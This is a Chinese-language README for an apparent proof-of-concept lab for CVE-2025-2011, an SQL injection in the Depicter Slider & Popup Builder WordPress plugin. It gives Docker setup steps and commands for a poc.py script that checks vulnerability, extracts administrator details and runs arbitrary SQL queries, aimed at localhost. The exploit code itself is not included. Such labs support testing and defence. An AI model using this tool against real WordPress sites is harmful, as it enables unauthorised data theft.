CVE 参考: CVE-2025-2011
本仓库包含一个用于测试 Depicter Slider & Popup Builder 插件(版本 < 3.6.2)中 SQL 注入漏洞的概念验证环境。
requests、colorama启动环境
docker-compose up -d
完成 WordPress 安装
http://localhost:5555安装存在漏洞的插件
chmod +x install-plugin.sh
./install-plugin.sh
该脚本将执行以下操作:
安装 Python 依赖
pip install requests colorama
PoC 脚本(poc.py)可用于在不同模式下测试漏洞:
检查目标是否存在漏洞
python poc.py -u http://localhost:5555
提取管理员详细信息
python poc.py -u http://localhost:5555 -m admin
执行自定义 SQL 查询
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
启用调试输出
python poc.py -u http://localhost:5555 -d
停止并移除环境:
docker-compose down -v
本环境仅用于教育和测试目的。未经明确许可,请勿将其用于任何系统。